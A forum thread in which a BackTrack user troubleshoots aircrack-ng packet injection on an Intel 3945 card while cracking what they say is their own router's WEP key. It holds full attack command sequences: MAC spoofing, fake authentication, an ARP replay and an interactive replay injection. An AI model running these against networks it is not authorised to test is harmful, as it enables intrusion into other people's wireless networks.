Intel Pro/Wireless 3945 ABG - Packet injection Issues

[zarozz]

Im running BT4 final live from a usb.
i've been trying to learn how to hack my routers wep key.
and im wondering if the issue is that my wireless card doesnt support packet injection.
when i use - airreplay-ng -9 wlan0
it says injection is successful ect. and shows a list of AP's
but once ive made an association with a network and then proceed to use
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx wlan0
it only reads packets it just sits on 0 packets sent.
wondering if anyone knows what problems i may be having.

[Radar_mX]

you don't use wlan0

read aircrack-ng wiki on their website

first step is "airmon-ng start wlan0"

[zarozz]

I am using that as my first command.
i was just using aireplay-ng -9 wlan0 to test if my packet injection is working which this commands replies that it is. but it doesnt seem to be when it is needed.

so to be more specific this is what im doing


airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
// this successfully fakes my mac adress
airmon-ng start wlan0
//this returns wlan0 ipw3945 (monitor mode enabled on mon0)
airodump-ng wlan0
airodump-ng -c x -w xxx --bssid xx:xx:xx:xx:xx:xx wlan0
// left running
**new konsole**
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 -e xxx wlan0
//to which i get a sucessful assotiation.
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
// this step doenst work properly
it displays
read 33499 packets ( got 0 arp requests and 0 acks), sent 0 packets...(0pps)

i have tried replacing wlan0 with mon0.

any help would be great thannks =]

[CrazyBranch]

I am using that as my first command.
i was just using aireplay-ng -9 wlan0 to test if my packet injection is working which this commands replies that it is. but it doesnt seem to be when it is needed.

so to be more specific this is what im doing


airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
// this successfully fakes my mac adress
airmon-ng start wlan0
//this returns wlan0 ipw3945 (monitor mode enabled on mon0)
airodump-ng wlan0
airodump-ng -c x -w xxx --bssid xx:xx:xx:xx:xx:xx wlan0
// left running
**new konsole**
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 -e xxx wlan0
//to which i get a sucessful assotiation.
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0
// this step doenst work properly
it displays
read 33499 packets ( got 0 arp requests and 0 acks), sent 0 packets...(0pps)

i have tried replacing wlan0 with mon0.

any help would be great thannks =]

If I am not wrong -3 is replay option, so as the word says, it replays ARP req's. That means it has to capture first some packets in order to inject them...long ago i read somewhere that pinging an non-existing IP address in your network should help with generation of ARP packets...Or you can use packetforge to make one of yours...

Someone correct me if i'm wrong.

[moorejohn90]

You can get escape that problem by making as below

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b " AP or Router MAC"-h "MAC address of fake authenticate" mon0

And it start reading packet. If will ask you question, answer yes or press enter.
And check "Data" counting in the airodump-ng.

I hope that can help you.